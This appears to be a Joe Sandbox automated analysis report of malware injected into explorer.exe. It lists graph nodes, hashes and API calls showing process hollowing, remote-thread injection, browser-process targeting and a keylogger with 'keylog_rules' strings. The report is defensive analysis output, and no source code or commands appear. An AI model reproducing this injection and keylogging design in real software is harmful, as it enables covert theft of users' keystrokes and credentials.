                        • API String ID: 3827878703-0
                        • Opcode ID: e549564f270788fbd34c59bf4763a347c6ac964be301a5b12217beb95dc68d5a
                        • Instruction ID: 674c82da2e49d9e24d7c14e76e2751681184b4c85384435cddc6793034973ce5
                        • Opcode Fuzzy Hash: e549564f270788fbd34c59bf4763a347c6ac964be301a5b12217beb95dc68d5a
                        • Instruction Fuzzy Hash: 0931A17570061AABCF24CF29CC88B76B7E8FF15329B14456DE886C7600E731E885CBA0

                        Execution Graph

                        Execution Coverage:8.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:9
                        Total number of Limit Nodes:2
                        execution_graph 764 f79fab 765 f79fd8 764->765 767 f79ff8 764->767 768 f7a048 765->768 772 f7a04d 768->772 769 f7a135 LoadLibraryA 769->772 770 f7a190 VirtualProtect VirtualProtect 771 f7a1e8 770->771 771->771 772->769 772->770 773 f7a185 772->773 773->767

                        Callgraph

                        callgraph 0 Function_00F71576 1 Function_00F72BF4 2 Function_00F72774 3 Function_00F71B70 4 Function_00F71E70 5 Function_00F72B70 32 Function_00F71838 5->32 50 Function_00F71A04 5->50 6 Function_00F730F0 12 Function_00F71860 6->12 25 Function_00F71C58 6->25 6->32 56 Function_00F71A88 6->56 58 Function_00F72508 6->58 7 Function_00F725FC 8 Function_00F714F9 9 Function_00F718F8 10 Function_00F72860 10->2 10->3 39 Function_00F72620 10->39 11 Function_00F71560 12->3 13 Function_00F724E0 14 Function_00F7156C 15 Function_00F718E8 16 Function_00F7B0D5 17 Function_00F71254 18 Function_00F714D4 19 Function_00F71DD4 19->32 20 Function_00F72054 20->4 20->9 20->12 21 Function_00F718D0 20->21 28 Function_00F71F40 20->28 20->32 33 Function_00F71938 20->33 45 Function_00F72010 20->45 53 Function_00F7188C 20->53 22 Function_00F71D50 22->32 23 Function_00F7355C 23->3 23->6 23->23 23->32 38 Function_00F73220 23->38 24 Function_00F74059 26 Function_00F725C4 26->7 27 Function_00F74A41 28->9 28->32 29 Function_00F7A048 54 Function_00F7A00A 29->54 30 Function_00F714B2 31 Function_00F71BB0 34 Function_00F72CB8 34->12 34->32 40 Function_00F71D20 34->40 35 Function_00F745A7 36 Function_00F71822 37 Function_00F741A1 38->3 38->10 38->31 38->32 38->33 43 Function_00F71C28 38->43 57 Function_00F71C08 38->57 41 Function_00F73020 41->3 48 Function_00F72E98 41->48 42 Function_00F79FAB 42->29 44 Function_00F7B115 45->50 46 Function_00F7141D 47 Function_00F72418 47->12 47->20 47->32 48->1 48->5 48->19 48->34 48->50 59 Function_00F72E08 48->59 49 Function_00F71405 51 Function_00F71000 52 Function_00F72E80 53->32 55 Function_00F71508 58->13 58->21 58->26 59->12 59->15 59->22 59->47 60 Function_00F73088 60->3 60->48

                        Control-flow Graph

                        control_flow_graph 118 f7355c-f7356c call f71b70 121 f73572-f735a5 call f71838 118->121 122 f735fc-f73601 118->122 126 f735a7 call f71838 121->126 127 f735d1-f735f6 NtUnmapViewOfSection 121->127 129 f735ac-f735c5 126->129 131 f73608-f73617 call f73220 127->131 132 f735f8-f735fa 127->132 129->127 138 f73621-f7362a 131->138 139 f73619-f7361c call f7355c 131->139 132->122 134 f73602-f73607 call f730f0 132->134 134->131 139->138
                        APIs
                        • NtUnmapViewOfSection.NTDLL ref: 00F735D8
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F71000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_f71000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: SectionUnmapView
                        • String ID:
                        • API String ID: 498011366-0
                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                        • Instruction ID: f02b85b299c6d45abf9d7caec5e2e76427aca82f2f89f2a7304dc8e81174e567
                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                        • Instruction Fuzzy Hash: 3111C830A159096FEB58BBBC9C9E67937A0FB54311F58813BA41DC76A1DA3D8A40E702

                        Control-flow Graph

                        control_flow_graph 0 f73220-f7325b call f71838 3 f73261-f73273 CreateToolhelp32Snapshot 0->3 4 f73549-f73554 SleepEx 3->4 5 f73279-f7328f Process32First 3->5 4->3 6 f73538-f7353a 5->6 7 f73294-f732ac lstrcmpi 6->7 8 f73540-f73543 FindCloseChangeNotification 6->8 9 f732b2-f732c6 7->9 10 f7348c-f73495 call f71bb0 7->10 8->4 9->10 14 f732cc-f732e0 9->14 15 f7349b-f734a4 call f71c08 10->15 16 f7352a-f73532 Process32Next 10->16 14->10 21 f732e6-f732fa 14->21 15->16 20 f734aa-f734b1 call f71c28 15->20 16->6 20->16 25 f734b3-f734c1 call f71b70 20->25 21->10 26 f73300-f73314 21->26 25->16 30 f734c3-f73525 call f71938 call f72860 call f71938 25->30 26->10 31 f7331a-f7332e 26->31 30->16 31->10 34 f73334-f73348 31->34 34->10 39 f7334e-f73362 34->39 39->10 43 f73368-f7337c 39->43 43->10 45 f73382-f73396 43->45 45->10 47 f7339c-f733b0 45->47 47->10 49 f733b6-f733ca 47->49 49->10 51 f733d0-f733e4 49->51 51->10 53 f733ea-f733fe 51->53 53->10 55 f73404-f73418 53->55 55->10 57 f7341a-f7342e 55->57 57->10 59 f73430-f73444 57->59 59->10 61 f73446-f7345a 59->61 61->10 63 f7345c-f73470 61->63 63->10 65 f73472-f73486 63->65 65->10 65->16
                        APIs
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F71000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_f71000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSleepSnapshotToolhelp32lstrcmpi
                        • String ID:
                        • API String ID: 2313719238-0
                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                        • Instruction ID: 53a6eeb7f0e144e12537ff0d549f052ad1083f528cf86ad29a3a209f1160bc86
                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                        • Instruction Fuzzy Hash: 6F8142312186099FE71AEF54EC58BEAB7A1FB50750F04861FA046C3160EF78DA04EB82

                        Control-flow Graph

                        control_flow_graph 67 f7a048-f7a04b 68 f7a055-f7a059 67->68 69 f7a065 68->69 70 f7a05b-f7a063 68->70 71 f7a067 69->71 72 f7a04d-f7a053 69->72 70->69 73 f7a06a-f7a071 71->73 72->68 75 f7a073-f7a07b 73->75 76 f7a07d 73->76 75->76 76->73 77 f7a07f-f7a082 76->77 78 f7a097-f7a0a4 77->78 79 f7a084-f7a092 77->79 89 f7a0a6-f7a0a8 78->89 90 f7a0be-f7a0cc call f7a00a 78->90 80 f7a094-f7a095 79->80 81 f7a0ce-f7a0e9 79->81 80->78 83 f7a11a-f7a11d 81->83 84 f7a122-f7a129 83->84 85 f7a11f-f7a120 83->85 88 f7a12f-f7a133 84->88 87 f7a101-f7a105 85->87 91 f7a107-f7a10a 87->91 92 f7a0eb-f7a0ee 87->92 93 f7a135-f7a14e LoadLibraryA 88->93 94 f7a190-f7a1e4 VirtualProtect * 2 88->94 95 f7a0ab-f7a0b2 89->95 90->68 91->84 96 f7a10c-f7a110 91->96 92->84 100 f7a0f0 92->100 99 f7a14f-f7a156 93->99 97 f7a1e8-f7a1ed 94->97 112 f7a0b4-f7a0ba 95->112 113 f7a0bc 95->113 101 f7a112-f7a119 96->101 102 f7a0f1-f7a0f5 96->102 97->97 103 f7a1ef-f7a1fe 97->103 99->88 105 f7a158 99->105 100->102 101->83 102->87 106 f7a0f7-f7a0f9 102->106 109 f7a164-f7a16c 105->109 110 f7a15a-f7a162 105->110 106->87 111 f7a0fb-f7a0ff 106->111 114 f7a16e-f7a17a 109->114 110->114 111->87 111->91 112->113 113->90 113->95 116 f7a185-f7a18f 114->116 117 f7a17c-f7a183 114->117 117->99
                        APIs
                        • LoadLibraryA.KERNELBASE ref: 00F7A147
                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 00F7A1BB
                        • VirtualProtect.KERNELBASE ref: 00F7A1D9
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2941442653.0000000000F77000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F77000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_f77000_explorer.jbxd
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                        • Instruction ID: e404077e2627cdea0ca90cb08a3d6a4a6a15c0f5eec89f508403bf7cc7abde5e
                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                        • Instruction Fuzzy Hash: 2951993275891D4ADB24AB389CC07BDB3C1E795335F594A2BD08EC3284E999D846A783

                        Execution Graph

                        Execution Coverage:15.1%
                        Dynamic/Decrypted Code Coverage:97.6%
                        Signature Coverage:18.6%
                        Total number of Nodes:328
                        Total number of Limit Nodes:7
                        execution_graph 770 6d29bd VirtualAlloc 1023 6d182d 1024 6d1838 RtlEnterCriticalSection lstrlenW 1023->1024 1025 6d18a8 RtlLeaveCriticalSection Sleep 1024->1025 1026 6d1854 1024->1026 1025->1024 1026->1025 1029 6d29eb VirtualQuery GetProcessHeap HeapFree 1026->1029 1032 6d25a4 1026->1032 1038 6d200d 1026->1038 1049 6d29ae VirtualFree 1026->1049 1050 6d2a09 GetProcessHeap RtlAllocateHeap 1026->1050 1029->1026 1033 6d25b9 CryptBinaryToStringA 1032->1033 1034 6d25e8 1032->1034 1033->1034 1035 6d25cc 1033->1035 1034->1026 1051 6d2a09 GetProcessHeap RtlAllocateHeap 1035->1051 1037 6d25d7 CryptBinaryToStringA 1037->1034 1039 6d2030 1038->1039 1040 6d2023 lstrlen 1038->1040 1052 6d2a09 GetProcessHeap RtlAllocateHeap 1039->1052 1040->1039 1042 6d2038 lstrcat 1043 6d206d lstrcat 1042->1043 1044 6d2074 1042->1044 1043->1044 1053 6d20a1 1044->1053 1047 6d29eb 3 API calls 1048 6d2097 1047->1048 1048->1026 1049->1026 1050->1026 1051->1037 1052->1042 1087 6d240f 1053->1087 1057 6d20ce 1092 6d298a lstrlen MultiByteToWideChar 1057->1092 1059 6d20dd 1093 6d24cc RtlZeroMemory 1059->1093 1062 6d212f RtlZeroMemory 1064 6d2164 1062->1064 1063 6d29eb 3 API calls 1065 6d2084 1063->1065 1068 6d23f1 1064->1068 1070 6d2192 1064->1070 1095 6d243d 1064->1095 1065->1047 1067 6d23d7 1067->1068 1069 6d29eb 3 API calls 1067->1069 1068->1063 1069->1068 1070->1067 1104 6d2a09 GetProcessHeap RtlAllocateHeap 1070->1104 1072 6d2262 wsprintfW 1073 6d2288 1072->1073 1077 6d22f5 1073->1077 1105 6d2a09 GetProcessHeap RtlAllocateHeap 1073->1105 1075 6d22c2 wsprintfW 1075->1077 1076 6d23b4 1078 6d29eb 3 API calls 1076->1078 1077->1076 1106 6d2a09 GetProcessHeap RtlAllocateHeap 1077->1106 1080 6d23c8 1078->1080 1080->1067 1081 6d29eb 3 API calls 1080->1081 1081->1067 1082 6d23ad 1084 6d29eb 3 API calls 1082->1084 1083 6d2340 1083->1082 1107 6d29bd VirtualAlloc 1083->1107 1084->1076 1086 6d239a RtlMoveMemory 1086->1082 1088 6d2419 1087->1088 1089 6d20c0 1087->1089 1090 6d2841 2 API 
calls 1088->1090 1091 6d2a09 GetProcessHeap RtlAllocateHeap 1089->1091 1090->1089 1091->1057 1092->1059 1094 6d20ed 1093->1094 1094->1062 1094->1068 1097 6d244a 1095->1097 1098 6d24ab 1095->1098 1096 6d244e DnsQuery_W 1096->1097 1097->1096 1097->1098 1099 6d248d DnsFree inet_ntoa 1097->1099 1098->1070 1099->1097 1100 6d24ad 1099->1100 1108 6d2a09 GetProcessHeap RtlAllocateHeap 1100->1108 1102 6d24b7 1109 6d298a lstrlen MultiByteToWideChar 1102->1109 1104->1072 1105->1075 1106->1083 1107->1086 1108->1102 1109->1098 771 6d29ae VirtualFree 1110 6d162b 1111 6d163c 1110->1111 1116 6d16aa 1110->1116 1112 6d164b GetKeyboardState 1111->1112 1111->1116 1113 6d165c ToUnicode 1112->1113 1112->1116 1114 6d1684 1113->1114 1114->1116 1117 6d16b9 RtlEnterCriticalSection 1114->1117 1118 6d17ce RtlLeaveCriticalSection 1117->1118 1119 6d16d2 lstrlenW 1117->1119 1118->1116 1120 6d16ed lstrlenW 1119->1120 1121 6d17bd 1119->1121 1122 6d1702 1120->1122 1121->1118 1123 6d174e GetForegroundWindow 1122->1123 1124 6d1723 1122->1124 1123->1121 1125 6d175a GetWindowTextW 1123->1125 1124->1121 1136 6d17dc 1124->1136 1126 6d177a lstrcmpW 1125->1126 1127 6d1771 GetClassNameW 1125->1127 1129 6d17bf lstrcatW 1126->1129 1130 6d178b lstrcpyW 1126->1130 1127->1126 1129->1121 1133 6d17dc 4 API calls 1130->1133 1131 6d172f wsprintfW 1132 6d17b6 1131->1132 1135 6d29eb 3 API calls 1132->1135 1134 6d1798 wsprintfW 1133->1134 1134->1132 1135->1121 1139 6d2a09 GetProcessHeap RtlAllocateHeap 1136->1139 1138 6d17ed GetLocalTime wsprintfW 1138->1131 1139->1138 1140 6d1581 1141 6d158e 1140->1141 1142 6d1623 1141->1142 1143 6d15a7 GlobalFix 1141->1143 1143->1142 1145 6d15b5 1143->1145 1144 6d15e4 1161 6d293e 1144->1161 1145->1144 1146 6d15c0 1145->1146 1147 6d15c5 lstrlenW 1146->1147 1148 6d15f2 1146->1148 1160 6d2a09 GetProcessHeap RtlAllocateHeap 1147->1160 1150 6d2724 VirtualQuery 1148->1150 1152 6d15fb 1150->1152 1154 6d15ff lstrlenW 1152->1154 1155 6d161b GlobalUnWire 1152->1155 1153 6d15d8 lstrcatW 
1153->1148 1154->1155 1156 6d160a 1154->1156 1155->1142 1157 6d16b9 19 API calls 1156->1157 1158 6d1614 1157->1158 1159 6d29eb 3 API calls 1158->1159 1159->1155 1160->1153 1162 6d294d lstrlen 1161->1162 1163 6d2982 1161->1163 1168 6d2a09 GetProcessHeap RtlAllocateHeap 1162->1168 1163->1148 1165 6d2963 MultiByteToWideChar 1165->1163 1166 6d297b 1165->1166 1167 6d29eb 3 API calls 1166->1167 1167->1163 1168->1165 772 6d9ae0 773 6d9ca4 772->773 774 6d9aeb 772->774 773->773 775 6d9bfa LoadLibraryA 774->775 779 6d9c3f VirtualProtect VirtualProtect 774->779 776 6d9c11 775->776 776->774 778 6d9c23 GetProcAddress 776->778 778->776 780 6d9c39 778->780 779->773 781 6d1000 782 6d1007 781->782 783 6d1010 781->783 785 6d1016 782->785 827 6d2724 VirtualQuery 785->827 787 6d1098 787->783 790 6d102c RtlMoveMemory 791 6d104d 790->791 792 6d1072 NtUnmapViewOfSection GetCurrentProcessId 790->792 857 6d2a09 GetProcessHeap RtlAllocateHeap 791->857 794 6d109f 792->794 795 6d1093 792->795 830 6d10a5 794->830 795->787 798 6d1096 795->798 797 6d1053 RtlMoveMemory 797->792 858 6d13ae RtlZeroMemory VirtualQuery 798->858 799 6d10a4 801 6d2a09 GetProcessHeap RtlAllocateHeap 799->801 802 6d10bf 801->802 803 6d2a09 GetProcessHeap RtlAllocateHeap 802->803 804 6d10cc wsprintfA 803->804 809 6d10f3 804->809 805 6d276d OpenFileMappingA MapViewOfFile 805->809 806 6d129a Sleep 806->809 807 6d2841 lstrlen lstrlen 807->809 808 6d275a UnmapViewOfFile CloseHandle 808->806 809->805 809->806 809->807 810 6d2a09 GetProcessHeap RtlAllocateHeap 809->810 812 6d1285 809->812 811 6d1150 RtlMoveMemory CreateToolhelp32Snapshot 810->811 811->812 813 6d1171 Process32First 811->813 812->808 814 6d29eb VirtualQuery GetProcessHeap HeapFree 812->814 815 6d118d 813->815 816 6d127e FindCloseChangeNotification 813->816 814->812 817 6d1190 CharLowerA 815->817 816->812 818 6d11ab lstrcmpiA 817->818 819 6d1266 Process32Next 817->819 818->819 820 6d11c3 818->820 819->817 819->820 820->816 820->819 821 6d12ae 16 API calls 820->821 
825 6d11d6 820->825 821->820 822 6d26c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 822->825 823 6d2724 VirtualQuery 823->825 824 6d1208 lstrcmpiA 824->825 825->819 825->822 825->823 825->824 826 6d18bf 30 API calls 825->826 826->825 828 6d101e 827->828 828->787 829 6d2a09 GetProcessHeap RtlAllocateHeap 828->829 829->790 887 6d2a09 GetProcessHeap RtlAllocateHeap 830->887 832 6d10bf 888 6d2a09 GetProcessHeap RtlAllocateHeap 832->888 834 6d10cc wsprintfA 836 6d10f3 834->836 837 6d129a Sleep 836->837 838 6d1285 836->838 839 6d2841 lstrlen lstrlen 836->839 889 6d276d OpenFileMappingA 836->889 892 6d2a09 GetProcessHeap RtlAllocateHeap 836->892 837->836 949 6d29eb 838->949 954 6d275a UnmapViewOfFile CloseHandle 838->954 839->836 842 6d1150 RtlMoveMemory CreateToolhelp32Snapshot 842->838 843 6d1171 Process32First 842->843 845 6d118d 843->845 846 6d127e FindCloseChangeNotification 843->846 847 6d1190 CharLowerA 845->847 846->838 848 6d11ab lstrcmpiA 847->848 849 6d1266 Process32Next 847->849 848->849 850 6d11c3 848->850 849->847 849->850 850->846 850->849 856 6d11d6 850->856 893 6d12ae 850->893 853 6d2724 VirtualQuery 853->856 854 6d1208 lstrcmpiA 854->856 856->849 856->853 856->854 912 6d26c9 OpenProcess 856->912 918 6d18bf 856->918 857->797 859 6d13e4 858->859 979 6d2a09 GetProcessHeap RtlAllocateHeap 859->979 861 6d1402 GetModuleFileNameA 980 6d2a09 GetProcessHeap RtlAllocateHeap 861->980 863 6d1418 GetCurrentProcessId wsprintfA 981 6d2799 CryptAcquireContextA 863->981 866 6d145f RtlInitializeCriticalSection 986 6d2a09 GetProcessHeap RtlAllocateHeap 866->986 867 6d151b 868 6d29eb 3 API calls 867->868 870 6d1522 868->870 872 6d29eb 3 API calls 870->872 871 6d147f Sleep 987 6d25f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 871->987 874 6d1529 RtlExitUserThread 872->874 878 6d1533 874->878 875 6d1496 GetModuleHandleA GetProcAddress 876 6d14b5 875->876 877 6d14c6 GetModuleHandleA GetProcAddress 875->877 995 6d1f3a 876->995 880 
6d14d9 877->880 881 6d14ea GetModuleHandleA 877->881 878->794 882 6d1f3a 3 API calls 880->882 1005 6d1e89 881->1005 882->881 885 6d25f1 10 API calls 886 6d1501 CreateThread CloseHandle 885->886 886->867 887->832 888->834 890 6d2794 889->890 891 6d2781 MapViewOfFile 889->891 890->836 891->890 892->842 894 6d12c5 893->894 910 6d13a4 893->910 894->910 955 6d29bd VirtualAlloc 894->955 896 6d12d9 lstrlen 956 6d2a09 GetProcessHeap RtlAllocateHeap 896->956 898 6d12f0 899 6d1351 898->899 957 6d2841 lstrlen lstrlen 898->957 900 6d29eb 3 API calls 899->900 909 6d1375 900->909 903 6d1399 963 6d29ae VirtualFree 903->963 904 6d1329 RtlMoveMemory 959 6d2569 904->959 905 6d1353 RtlMoveMemory 908 6d2569 2 API calls 905->908 908->899 909->903 911 6d1388 PathMatchSpecA 909->911 910->850 911->903 911->909 913 6d271c 912->913 914 6d26e7 IsWow64Process 912->914 913->856 915 6d26f8 IsWow64Process 914->915 916 6d270a 914->916 915->916 917 6d2715 CloseHandle 915->917 916->917 917->913 919 6d2724 VirtualQuery 918->919 920 6d18d9 919->920 921 6d18eb OpenProcess 920->921 922 6d1b1c 920->922 921->922 923 6d1904 921->923 922->856 924 6d2724 VirtualQuery 923->924 925 6d190b 924->925 925->922 926 6d1919 NtSetInformationProcess 925->926 927 6d1935 925->927 926->927 964 6d1b26 927->964 930 6d1b26 2 API calls 931 6d197c 930->931 932 6d1b19 CloseHandle 931->932 933 6d1b26 2 API calls 931->933 932->922 934 6d19a6 933->934 970 6d1bbd 934->970 937 6d1b26 2 API calls 938 6d19d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 937->938 939 6d1a2b 938->939 940 6d1af4 CreateRemoteThread 938->940 941 6d1a31 CreateMutexA GetLastError 939->941 945 6d1a61 GetModuleHandleA GetProcAddress ReadProcessMemory 939->945 942 6d1b0b CloseHandle 940->942 941->939 944 6d1a4d CloseHandle Sleep 941->944 943 6d1b0d CloseHandle CloseHandle 942->943 943->932 944->941 946 6d1aed 945->946 947 6d1a92 WriteProcessMemory 945->947 946->942 946->943 947->946 948 6d1abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 947->948 
948->946 950 6d2724 VirtualQuery 949->950 951 6d29f3 950->951 952 6d2a07 951->952 953 6d29f7 GetProcessHeap HeapFree 951->953 952->838 953->952 954->837 955->896 956->898 958 6d130c RtlZeroMemory 957->958 958->904 958->905 960 6d2577 lstrlen RtlMoveMemory 959->960 961 6d25a1 959->961 960->961 961->898 963->910 965 6d1b3a 964->965 969 6d195a 964->969 966 6d1b4a NtCreateSection 965->966 967 6d1b69 965->967 966->967 968 6d1b7e NtMapViewOfSection 967->968 967->969 968->969 969->930 971 6d1bd4 970->971 977 6d1c06 970->977 972 6d1bd6 RtlMoveMemory 971->972 972->972 972->977 973 6d1c69 974 6d19b6 NtUnmapViewOfSection 973->974 976 6d1c87 LdrProcessRelocationBlock 973->976 974->937 975 6d1c17 LoadLibraryA 975->974 975->977 976->973 976->974 977->973 977->975 978 6d1c47 GetProcAddress 977->978 978->974 978->977 979->861 980->863 982 6d27bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 981->982 983 6d1445 CreateMutexA GetLastError 981->983 984 6d2805 wsprintfA 982->984 983->866 983->867 984->984 985 6d2827 CryptDestroyHash CryptReleaseContext 984->985 985->983 986->871 988 6d2631 987->988 989 6d2681 CloseHandle 988->989 990 6d2671 Thread32Next 988->990 991 6d263d OpenThread 988->991 989->875 990->988 992 6d2658 SuspendThread 991->992 993 6d2660 ResumeThread 991->993 994 6d2666 CloseHandle 992->994 993->994 994->990 996 6d1fad 995->996 997 6d1f44 995->997 996->877 997->996 1014 6d1fea VirtualProtect 997->1014 999 6d1f5b 999->996 1015 6d29bd VirtualAlloc 999->1015 1001 6d1f67 1002 6d1f71 RtlMoveMemory 1001->1002 1003 6d1f84 1001->1003 1002->1003 1016 6d1fea VirtualProtect 1003->1016 1006 6d2724 VirtualQuery 1005->1006 1007 6d1e93 1006->1007 1010 6d14fa 1007->1010 1017 6d1ed8 1007->1017 1010->885 1012 6d1eba 1012->1010 1022 6d1fea VirtualProtect 1012->1022 1014->999 1015->1001 1016->996 1018 6d1e9e 1017->1018 1020 6d1eea 1017->1020 1018->1010 1021 6d1fea VirtualProtect 1018->1021 1019 6d1f04 lstrcmp 1019->1018 1019->1020 1020->1018 1020->1019 1021->1012 1022->1010

                        Callgraph

                        callgraph 0 Function_006D276D 1 Function_006D29E9 2 Function_006D2569 3 Function_006D29EB 22 Function_006D2724 3->22 4 Function_006D1FEA 5 Function_006D1E66 32 Function_006D1CBF 5->32 6 Function_006D9AE0 7 Function_006D25F1 8 Function_006D24CC 9 Function_006D26C9 10 Function_006D2841 11 Function_006D255C 12 Function_006D17DC 42 Function_006D2A09 12->42 13 Function_006D1ED8 14 Function_006D275A 15 Function_006D182D 15->3 16 Function_006D29AE 15->16 23 Function_006D25A4 15->23 39 Function_006D200D 15->39 15->42 17 Function_006D12AE 17->2 17->3 17->10 17->11 17->16 28 Function_006D29BD 17->28 17->42 18 Function_006D26AE 19 Function_006D13AE 19->3 19->7 35 Function_006D1F3A 19->35 19->42 43 Function_006D1E89 19->43 47 Function_006D2799 19->47 20 Function_006D162B 34 Function_006D16B9 20->34 21 Function_006D10A5 21->0 21->3 21->9 21->10 21->14 21->17 21->18 21->22 31 Function_006D18BF 21->31 38 Function_006D288D 21->38 40 Function_006D268F 21->40 21->42 23->42 24 Function_006D3627 25 Function_006D1B26 26 Function_006D1E26 26->32 27 Function_006D20A1 27->3 27->8 27->28 30 Function_006D243D 27->30 27->38 41 Function_006D240F 27->41 27->42 44 Function_006D298A 27->44 29 Function_006D1BBD 30->42 30->44 31->22 31->25 31->29 33 Function_006D293E 33->3 33->42 34->3 34->12 35->4 35->5 35->28 36 Function_006D1FB4 35->36 36->26 37 Function_006D1533 39->3 39->27 39->42 41->10 43->4 43->13 43->22 45 Function_006D1581 45->3 45->22 45->33 45->34 45->42 46 Function_006D1000 48 Function_006D1016 46->48 48->0 48->3 48->9 48->10 48->14 48->17 48->18 48->19 48->21 48->22 48->31 48->38 48->40 48->42

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006D2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,006D29F3,-00000001,006D128C), ref: 006D2731
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 006D1038
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 006D106C
                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 006D1075
                        • GetCurrentProcessId.KERNEL32(?,006D1010), ref: 006D107B
                        • wsprintfA.USER32 ref: 006D10E7
                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 006D1155
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006D1160
                        • Process32First.KERNEL32(00000000,?), ref: 006D117F
                        • CharLowerA.USER32(?), ref: 006D1199
                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 006D11B5
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 006D1212
                        • Process32Next.KERNEL32(00000000,00000128), ref: 006D126C
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 006D127F
                        • Sleep.KERNELBASE(000003E8), ref: 006D129F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateChangeCharCloseCreateCurrentFindFirstLowerNextNotificationQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                        • API String ID: 505104133-2805246637
                        • Opcode ID: c47f20a88e40928c1090702c175209b3e316f14930569476aea7b12aa91f6367
                        • Instruction ID: 52ed00166cdfe0dbed26ac246d06639ae72f992602f4787013ad0d286273988f
                        • Opcode Fuzzy Hash: c47f20a88e40928c1090702c175209b3e316f14930569476aea7b12aa91f6367
                        • Instruction Fuzzy Hash: 51510630E05311ABC714AF70DC9597A77ABEB59700F04062FF916CB3A1DA719E4586A2

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        • wsprintfA.USER32 ref: 006D10E7
                          • Part of subcall function 006D276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 006D2777
                          • Part of subcall function 006D276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,006D10FE), ref: 006D2789
                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 006D1155
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006D1160
                        • Process32First.KERNEL32(00000000,?), ref: 006D117F
                        • CharLowerA.USER32(?), ref: 006D1199
                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 006D11B5
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 006D1212
                        • Process32Next.KERNEL32(00000000,00000128), ref: 006D126C
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 006D127F
                        • Sleep.KERNELBASE(000003E8), ref: 006D129F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: FileHeapProcess32lstrcmpi$AllocateChangeCharCloseCreateFindFirstLowerMappingMemoryMoveNextNotificationOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                        • API String ID: 4279457983-2805246637
                        • Opcode ID: 0e10fa919795440fe74efd26f80a5b15aa890409b664abf3f99f2870f0823f03
                        • Instruction ID: 64f7a564454bf5b262474b52469ba78598d208d7df8891424257e9fac1113e1f
                        • Opcode Fuzzy Hash: 0e10fa919795440fe74efd26f80a5b15aa890409b664abf3f99f2870f0823f03
                        • Instruction Fuzzy Hash: BC412530E043156BC714AF709C9597E77ABEB99740F00062FF9528B3D1EB71DE4986A2

                        Control-flow Graph

